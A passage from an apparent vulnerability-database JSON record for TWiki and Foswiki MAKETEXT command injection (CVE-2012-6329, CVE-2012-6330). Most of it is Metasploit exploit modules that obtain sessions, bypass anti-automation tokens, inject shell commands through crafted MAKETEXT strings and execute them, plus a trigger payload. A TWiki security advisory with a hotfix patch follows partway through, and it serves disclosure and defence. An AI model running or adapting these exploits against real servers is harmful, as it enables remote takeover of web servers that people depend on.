res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tsession = $1\r\n\t\treturn session\r\n\tend\r\n\r\n\tdef inject_code(session, code)\r\n\r\n\t\tvprint_status(\"Retrieving the crypttoken...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}do/edit#{@page}\",\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\",\r\n\t\t\t'vars_get' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'nowysiwyg' => '1'\r\n\t\t\t\t}\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\r\n\t\t\tvprint_error(\"Error retrieving the crypttoken\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tcrypttoken = $1\r\n\t\tvprint_good(\"crypttoken found: #{crypttoken}\")\r\n\r\n\t\tif session.empty?\r\n\t\t\tif res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/\r\n\t\t\t\tsession = $1\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"Error using anonymous access\")\r\n\t\t\t\treturn nil\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tvprint_status(\"Injecting the payload...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}do/save#{@page}\",\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\t'crypttoken' => crypttoken,\r\n\t\t\t\t'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\r\n\t\t\t}\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\r\n\t\t\tprint_warning(\"Error injecting the payload\")\r\n\t\t\tprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tlocation = URI(res.headers['Location']).path\r\n\t\tprint_good(\"Payload injected on #{location}\")\r\n\r\n\t\treturn location\r\n\tend\r\n\r\n\tdef check\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if 
@base[-1, 1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}do/view/TWiki/WebHome\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tif res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\t\t\tif version < \"5.1.3\"\r\n\t\t\t\treturn Exploit::CheckCode::Appears\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Detected\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# Init variables\r\n\t\t@page = ''\r\n\r\n\t\tif datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\r\n\t\t\t@page << '/' if datastore['TwikiPage'][0] != '/'\r\n\t\t\t@page << datastore['TwikiPage']\r\n\t\telse\r\n\t\t\t@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\r\n\t\tend\r\n\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\t# Login if needed\r\n\t\tif (datastore['USERNAME'] and\r\n\t\t\tnot datastore['USERNAME'].empty? 
and\r\n\t\t\tdatastore['PASSWORD'] and\r\n\t\t\tnot datastore['PASSWORD'].empty?)\r\n\t\t\tprint_status(\"Trying login to get session ID...\")\r\n\t\t\tsession = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n\t\telse\r\n\t\t\tprint_status(\"Using anonymous access...\")\r\n\t\t\tsession = \"\"\r\n\t\tend\r\n\r\n\t\tif not session\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\")\r\n\t\tend\r\n\r\n\t\t# Inject payload\r\n\t\tprint_status(\"Trying to inject the payload on #{@page}...\")\r\n\t\tres = inject_code(session, payload.encoded)\r\n\t\tif not res\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\")\r\n\t\tend\r\n\r\n\t\t# Execute payload\r\n\t\tprint_status(\"Executing the payload through #{res}...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => res,\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\"\r\n\t\t})\r\n\t\tif not res or res.code != 200 or res.body !~ /HASH/\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error executing the payload\")\r\n\t\tend\r\n\r\n\t\tprint_good(\"Exploitation was successful\")\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Trigger:\r\n\r\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\r\n\r\n=end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23579/"}, {"lastseen": "2016-02-02T21:18:59", "description": "Foswiki MAKETEXT Remote Command Execution. CVE-2012-6329,CVE-2012-6330. 
Remote exploit for unix platform", "published": "2012-12-23T00:00:00", "type": "exploitdb", "title": "Foswiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2012-12-23T00:00:00", "id": "EDB-ID:23580", "href": "https://www.exploit-db.com/exploits/23580/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Foswiki MAKETEXT Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the MAKETEXT Foswiki variable. By using\r\n\t\t\t\ta specially crafted MAKETEXT, a malicious user can execute shell commands since the\r\n\t\t\t\tinput is passed to the Perl \"eval\" command without first being sanitized. The\r\n\t\t\t\tproblem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n\t\t\t\tmodule. Only Foswiki sites that have user interface localization enabled\r\n\t\t\t\t(UserInterfaceInternationalisation variable set) are vulnerable.\r\n\r\n\t\t\t\t\tIf USERNAME and PASSWORD aren't provided, anonymous access will be tried.\r\n\t\t\t\tAlso, if the FoswikiPage option isn't provided, the module will try to create a\r\n\t\t\t\trandom page on the SandBox space. 
The modules has been tested successfully on\r\n\t\t\t\tFoswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Brian Carlson', # original discovery in Perl Locale::Maketext\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-6329' ],\r\n\t\t\t\t\t[ 'OSVDB', '88410' ],\r\n\t\t\t\t\t[ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false, # web server context\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic ruby python bash telnet'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'unix' ],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Foswiki 1.1.5', { }]],\r\n\t\t\t'DisclosureDate' => 'Dec 03 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [ true, \"Foswiki base path\", \"/\" ]),\r\n\t\t\t\tOptString.new('FoswikiPage', [ false, \"Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\r\n\t\t\t\tOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef do_login(username, password)\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}bin/login\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'username' => username,\r\n\t\t\t\t\t'password' => password\r\n\t\t\t\t}\r\n\t\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Set-Cookie'] !~ 
/FOSWIKISID=([0-9a-f]*)/\r\n\t\t\tvprint_status \"#{res.code}\\n#{res.body}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tsession = $1\r\n\t\treturn session\r\n\tend\r\n\r\n\tdef inject_code(session, code)\r\n\r\n\t\tvprint_status(\"Retrieving the validation_key...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}bin/edit#{@page}\",\r\n\t\t\t'cookie' => \"FOSWIKISID=#{session}\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200 or res.body !~ /name='validation_key' value='\\?([0-9a-f]*)'/\r\n\t\t\tvprint_error(\"Error retrieving the validation_key\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tvalidation_key = $1\r\n\t\tvprint_good(\"validation_key found: #{validation_key}\")\r\n\r\n\t\tif session.empty?\r\n\t\t\tif res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/\r\n\t\t\t\tsession = $1\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"Error using anonymous access\")\r\n\t\t\t\treturn nil\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tif res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/\r\n\t\t\tstrike_one = $1\r\n\t\telse\r\n\t\t\tvprint_error(\"Error getting the FOSWIKISTRIKEONE value\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\t# Transforming validation_key in order to bypass foswiki antiautomation\r\n\t\tvalidation_key = Rex::Text.md5(validation_key + strike_one)\r\n\t\tvprint_status(\"Transformed validation key: #{validation_key}\")\r\n\t\tvprint_status(\"Injecting the payload...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}bin/save#{@page}\",\r\n\t\t\t'cookie' => \"FOSWIKISID=#{session}\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\t'validation_key' => validation_key,\r\n\t\t\t\t'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\r\n\t\t\t}\r\n\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Location'] !~ 
/bin\\/view#{@page}/\r\n\t\t\tprint_warning(\"Error injecting the payload\")\r\n\t\t\tprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tlocation = URI(res.headers['Location']).path\r\n\t\tprint_good(\"Payload injected on #{location}\")\r\n\r\n\t\treturn location\r\n\tend\r\n\r\n\tdef check\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}System/WebHome\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tif res.body =~ /This site is running Foswiki version.*Foswiki-(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\t\t\tif version <= \"1.1.6\"\r\n\t\t\t\treturn Exploit::CheckCode::Appears\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Detected\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# Init variables\r\n\t\t@page = ''\r\n\r\n\t\tif datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty?\r\n\t\t\t@page << '/' if datastore['FoswikiPage'][0] != '/'\r\n\t\t\t@page << datastore['FoswikiPage']\r\n\t\telse\r\n\t\t\t@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\r\n\t\tend\r\n\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\t# Login if needed\r\n\t\tif (datastore['USERNAME'] and\r\n\t\t\tnot datastore['USERNAME'].empty? 
and\r\n\t\t\tdatastore['PASSWORD'] and\r\n\t\t\tnot datastore['PASSWORD'].empty?)\r\n\t\t\tprint_status(\"Trying login to get session ID...\")\r\n\t\t\tsession = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n\t\telse\r\n\t\t\tprint_status(\"Using anonymous access...\")\r\n\t\t\tsession = \"\"\r\n\t\tend\r\n\r\n\t\tif not session\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\")\r\n\t\tend\r\n\r\n\t\t# Inject payload\r\n\t\tprint_status(\"Trying to inject the payload on #{@page}...\")\r\n\t\tres = inject_code(session, payload.encoded)\r\n\t\tif not res or res !~ /#{@page}/\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\")\r\n\t\tend\r\n\r\n\t\t# Execute payload\r\n\t\tprint_status(\"Executing the payload through #{@page}...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}#{@page}\",\r\n\t\t\t'cookie' => \"FOSWIKISID=#{session}\"\r\n\t\t})\r\n\t\tif not res or res.code != 200 or res.body !~ /HASH/\r\n\t\t\tprint_status(\"#{res.code}\\n#{res.body}\")\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error executing the payload\")\r\n\t\tend\r\n\r\n\t\tprint_good(\"Exploitation was successful\")\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Trigger:\r\n\r\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\r\n\r\n=end\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23580/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:43", "description": "", "published": "2012-12-15T00:00:00", "type": "packetstorm", "title": "TWiki 5.1.2 Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-15T00:00:00", "id": "PACKETSTORM:118856", "href": "https://packetstormsecurity.com/files/118856/TWiki-5.1.2-Command-Execution.html", "sourceData": "`This security advisory alerts you of a potential security issue with \nTWiki 
installations: \nThe %MAKETEXT{}% TWiki variable allows arbitrary shell command \nexecution. The problem is caused by an underlying security issue in \nthe Locale::Maketext CPAN module. \n \n* Vulnerable Software Version \n* Attack Vectors \n* Impact \n* Severity Level \n* MITRE Name for this Vulnerability \n* Details \n* Countermeasures \n* Hotfix for TWiki Production Releases 5.1.x \n* Hotfix for older affected TWiki Releases \n* Authors and Credits \n* Action Plan with Timeline \n* External Links \n* Feedback \n \n---++ Vulnerable Software Version \n \n* TWiki-5.1.0 to TWiki-5.1.2 (TWikiRelease05x01x00 to \nTWikiRelease05x01x02) \n* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) \n* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) \n* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) \n* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) \n* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) \n \n---++ Attack Vectors \n \nEditing wiki pages and HTTP POST requests towards a TWiki server with \nenabled localization (typically port 80/TCP). Typically, prior \nauthentication is necessary. \n \n---++ Impact \n \nAn unauthenticated remote attacker can execute arbitrary shell \ncommands as the webserver user, such as user nobody. \n \n---++ Severity Level \n \nThe TWiki SecurityTeam triaged this issue as documented in \nTWikiSecurityAlertProcess [1] and assigned the following severity level: \n \n* Severity 1 issue: The web server can be compromised \n \n---++ MITRE Name for this Vulnerability \n \nThe Common Vulnerabilities and Exposures project has assigned the name \nCVE-2012-6329 [7] to this vulnerability. \n \n---++ Details \n \n1. Shell Command execution: The %MAKETEXT{}% TWiki variable is used to \nlocalize user interface content to a language of choice. Using a \nspecially crafted MAKETEXT, a malicious user can execute shell \ncommands by Perl backtick (``) operators. 
User input is passed to the \nPerl \"eval\" command without first being sanitized. The problem is \ncaused by an underlying security issue in the Locale::Maketext CPAN \nmodule. This works only in TWiki sites that have user interface \nlocalization enabled. \n \nIn addition, there are two less severe issues with MAKETEXT: \n \n2. Excessive memory allocation: %MAKETEXT{\"This is [_9999999999999999] \nEvil\"}% will consume all memory and swap space attempting to \ninitialize all missing entries in the parameters array. \n \n3. Crash: %MAKETEXT{\"This is [_0] problematic\"}% can cause a crash \nunder some circumstances. \n \n---++ Countermeasures \n \n* One of: \n* Disable localization by setting configure flag \n{UserInterfaceInternationalisation} to 0. \n* Apply hotfix (see patch below). \n* Upgrade to the latest patched production release TWiki-5.1.3 \n(TWikiRelease05x01x03) [2] when available. \n \n* In addition: \n* Install CPAN's Locale::Maketext version 1.23 or newer. \n* Use the {SafeEnvPath} configure setting to restrict the possible \ndirectories that are searched for executables. By default, this is \nthe PATH used by the webserver user. Set {SafeEnvPath} to a list of \nnon-writable directories, such as \"/bin:/usr/bin\". 
\n \n---++ Hotfix for TWiki Production Release 5.1.x \n \nAffected file: twiki/lib/TWiki.pm \n \nPatch to sanitize MAKETEXT parameters: \n \n=======( CUT 8><--- )=============================================== \n--- TWiki.pm (revision 24029) \n+++ TWiki.pm (working copy) \n@@ -4329,8 +4329,23 @@ \n \n# unescape parameters and calculate highest parameter number: \nmy $max = 0; \n- $str =~ s/~\\[(\\_(\\d+))~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge; \n- $str =~ s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > \n$max); \"[$1]\"/ge; \n+ my $min = 1; \n+ $str =~ s/~\\[(\\_(\\d+))~\\]/ \n+ $max = $2 if ($2 > $max); \n+ $min = $2 if ($2 < $min); \n+ \"[$1]\"/ge; \n+ $str =~ s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ \n+ $max = $2 if ($2 > $max); \n+ $min = $2 if ($2 < $min); \n+ \"[$1]\"/ge; \n+ \n+ # Item7080: Sanitize MAKETEXT variable: \n+ return \"MAKETEXT error: No more than 32 parameters are allowed\" \nif( $max > 32 ); \n+ return \"MAKETEXT error: Parameter 0 is not allowed\" if( $min < 1 ); \n+ if( $TWiki::cfg{UserInterfaceInternationalisation} ) { \n+ eval { require Locale::Maketext; }; \n+ $str =~ s#\\\\#\\\\\\\\#g if( $@ || !$@ && \n$Locale::Maketext::VERSION < 1.23 ); \n+ } \n \n# get the args to be interpolated. \nmy $argsStr = $params->{args} || \"\"; \n=======( CUT 8><--- )=============================================== \n \nThis patch is also available separately [3] in case this gets mangled \nby the e-mail. \n \nOn a properly patched system, %MAKETEXT{\" [_99] \"}% should return this \nerror: \"MAKETEXT error: No more than 32 parameters are allowed\" \n \n---++ Hotfix for older affected TWiki Releases \n \nApply above patch (line numbers may vary). \n \n---++ Authors and Credits \n \n* Credit to TWiki:Main.GeorgeClark for disclosing the issue to the twiki-security@lists.sourceforge.net \nmailing list, and for providing a proposed fix. \n* TWiki:Main.PeterThoeny for creating the fix, patch and advisory. 
\n \n---++ Action Plan with Timeline \n \n* 2012-12-10: User discloses issue to TWikiSecurityMailingList [4], \nGeorge Clark, Foswiki \n* 2012-12-10: Developer verifies issue, Peter Thoeny \n* 2012-12-10: Developer fixes code, Peter Thoeny \n* 2012-12-10: Security team creates advisory with hotfix, Peter Thoeny \n* 2012-12-11: Developer verifies patch, Hideyo Imazu \n* 2012-12-12: Send alert to TWikiAnnounceMailingList [5] and \nTWikiDevMailingList [6], Peter Thoeny \n* 2012-12-14: Publish advisory in Codev web and update all related \ntopics, Peter Thoeny \n* 2012-12-14: Issue a public security advisory to full- \ndisclosure[at]lists.grok.org.uk, cert[at]cert.org, \nvuln[at]secunia.com, bugs[at]securitytracker.com, Peter Thoeny \n \n---++ External Links \n \n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess \n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease05x01x03 \n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329 \n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList \n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList \n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList \n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329 - CVE \non MITRE.org \n \n---++ Feedback \n \nPlease provide feedback at the security alert topic, \nhttp://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329 \n \n-- Main.PeterThoeny - 2012-12-14 \n \n-- \n* Peter Thoeny - peter09[at]thoeny.org \n* http://TWiki.org - is your team already TWiki enabled? 
\n* Knowledge cannot be managed, it can be discovered and shared \n* This e-mail is: (_) private (x) ask first (_) public \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/118856/twiki5-exec.txt"}, {"lastseen": "2016-12-05T22:20:57", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119054", "href": "https://packetstormsecurity.com/files/119054/TWiki-MAKETEXT-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TWiki MAKETEXT Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the MAKETEXT Twiki variable. By using a \nspecially crafted MAKETEXT, a malicious user can execute shell commands since user \ninput is passed to the Perl \"eval\" command without first being sanitized. The \nproblem is caused by an underlying security issue in the CPAN:Locale::Maketext \nmodule. This works in TWiki sites that have user interface localization enabled \n(UserInterfaceInternationalisation variable set). \n \nIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, \nif the 'TwikiPage' option isn't provided, the module will try to create a random \npage on the SandBox space. 
The modules has been tested successfully on \nTWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. \n}, \n'Author' => \n[ \n'George Clark', # original discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-6329' ], \n[ 'OSVDB', '88460' ], \n[ 'BID', '56950' ], \n[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ] \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic ruby python bash telnet' \n} \n}, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Dec 15 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]), \nOptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]), \nOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]), \nOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ]) \n], self.class) \nend \n \ndef do_login(username, password) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}do/login\", \n'vars_post' => \n{ \n'username' => username, \n'password' => password \n} \n}) \n \nif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ \nreturn nil \nend \n \nsession = $1 \nreturn session \nend \n \ndef inject_code(session, code) \n \nvprint_status(\"Retrieving the crypttoken...\") \n \nres = send_request_cgi({ \n'uri' => \"#{@base}do/edit#{@page}\", \n'cookie' => \"TWIKISID=#{session}\", \n'vars_get' => \n{ \n'nowysiwyg' => '1' \n} \n}) \n \nif not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/ 
\nvprint_error(\"Error retrieving the crypttoken\") \nreturn nil \nend \n \ncrypttoken = $1 \nvprint_good(\"crypttoken found: #{crypttoken}\") \n \nif session.empty? \nif res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ \nsession = $1 \nelse \nvprint_error(\"Error using anonymous access\") \nreturn nil \nend \nend \n \nvprint_status(\"Injecting the payload...\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}do/save#{@page}\", \n'cookie' => \"TWIKISID=#{session}\", \n'vars_post' => \n{ \n'crypttoken' => crypttoken, \n'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\" \n} \n}) \n \nif not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/ \nprint_warning(\"Error injecting the payload\") \nprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\" \nreturn nil \nend \n \nlocation = URI(res.headers['Location']).path \nprint_good(\"Payload injected on #{location}\") \n \nreturn location \nend \n \ndef check \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \nres = send_request_cgi({ \n'uri' => \"#{@base}do/view/TWiki/WebHome\" \n}) \n \nif not res or res.code != 200 \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/ \nversion = $1 \nprint_status(\"Version found: #{version}\") \nif version < \"5.1.3\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \n \ndef exploit \n \n# Init variables \n@page = '' \n \nif datastore['TwikiPage'] and not datastore['TwikiPage'].empty? 
\n@page << '/' if datastore['TwikiPage'][0] != '/' \n@page << datastore['TwikiPage'] \nelse \n@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\" \nend \n \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \n# Login if needed \nif (datastore['USERNAME'] and \nnot datastore['USERNAME'].empty? and \ndatastore['PASSWORD'] and \nnot datastore['PASSWORD'].empty?) \nprint_status(\"Trying login to get session ID...\") \nsession = do_login(datastore['USERNAME'], datastore['PASSWORD']) \nelse \nprint_status(\"Using anonymous access...\") \nsession = \"\" \nend \n \nif not session \nfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\") \nend \n \n# Inject payload \nprint_status(\"Trying to inject the payload on #{@page}...\") \nres = inject_code(session, payload.encoded) \nif not res \nfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\") \nend \n \n# Execute payload \nprint_status(\"Executing the payload through #{res}...\") \nres = send_request_cgi({ \n'uri' => res, \n'cookie' => \"TWIKISID=#{session}\" \n}) 